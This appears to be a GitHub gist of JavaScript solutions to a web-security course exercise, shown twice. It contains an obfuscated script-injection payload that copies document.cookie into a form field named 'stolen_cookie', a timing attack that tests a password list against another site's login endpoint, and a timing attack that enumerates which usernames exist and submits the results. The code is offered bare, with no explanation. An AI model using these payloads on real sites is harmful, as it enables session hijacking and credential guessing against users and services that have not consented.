seckcoder/gist:914bde8487a3da71e0fe

## gistfile1.js
<script>
var id = String.fromCharcode([115, 116, 111, 108, 101, 110, 95, 99, 111, 111, 107, 105, 101]);
document.getElementById(id).value = document.cookie;
</script>


// Timing Attack # 1
function checkPwd(passwd) {
  var start_time = new Date().getTime();
  $.ajax({
    type:"POST",
    url:"http://otherSiteA/exercises/mixingContent/authLvl1.php?pass=" + passwd,
    success: function() {
       alert(passwd + " succeed");
    },
    error: function (xhr, status, error) {
        var end_time = new Date().getTime();
        if (end_time - start_time >= 1000) {
            console.log(passwd);
        }
    }
  });
}
passwords.forEach(function (passwd) {
  checkPwd(passwd);
});

// Timing Attack # 2
$(document).ready(function () {
var counter = 1;
var img = document.getElementById("useMe");

function checkUserRec(idx) {
  if (idx >= 32) return;
  var uname = $("#name"+idx)[0].innerHTML;
  console.log($("#name"+idx));
  var checkbox = "#check" + idx;
  var start_time = new Date().getTime();
  img.src = "http://otherSiteA/exercises/mixingContent/authLvl2.php?name=" + uname;
  img.onload = function () {
    console.log("image loaded");
  };
  img.onerror = function () {

    var end_time = new Date().getTime();
    if (end_time - start_time < 1000) {
      console.log(uname + " is checked; ", end_time-start_time);
      $(checkbox).prop("checked", true);
    } else {
       // ignore
    }
    counter += 1;
    if (counter == 33) {
      // all finished
      $("form")[0].submit();
    }
    checkUserRec(idx+1);
  };
}

checkUserRec(0);

});
	<script>
	var id = String.fromCharcode([115, 116, 111, 108, 101, 110, 95, 99, 111, 111, 107, 105, 101]);
	document.getElementById(id).value = document.cookie;
	</script>



	// Timing Attack # 1
	function checkPwd(passwd) {
	var start_time = new Date().getTime();
	$.ajax({
	type:"POST",
	url:"http://otherSiteA/exercises/mixingContent/authLvl1.php?pass=" + passwd,
	success: function() {
	alert(passwd + " succeed");
	},
	error: function (xhr, status, error) {
	var end_time = new Date().getTime();
	if (end_time - start_time >= 1000) {
	console.log(passwd);
	}
	}
	});
	}
	passwords.forEach(function (passwd) {
	checkPwd(passwd);
	});

	// Timing Attack # 2
	$(document).ready(function () {
	var counter = 1;
	var img = document.getElementById("useMe");

	function checkUserRec(idx) {
	if (idx >= 32) return;
	var uname = $("#name"+idx)[0].innerHTML;
	console.log($("#name"+idx));
	var checkbox = "#check" + idx;
	var start_time = new Date().getTime();
	img.src = "http://otherSiteA/exercises/mixingContent/authLvl2.php?name=" + uname;
	img.onload = function () {
	console.log("image loaded");
	};
	img.onerror = function () {

	var end_time = new Date().getTime();
	if (end_time - start_time < 1000) {
	console.log(uname + " is checked; ", end_time-start_time);
	$(checkbox).prop("checked", true);
	} else {
	// ignore
	}
	counter += 1;
	if (counter == 33) {
	// all finished
	$("form")[0].submit();
	}
	checkUserRec(idx+1);
	};
	}

	checkUserRec(0);

	});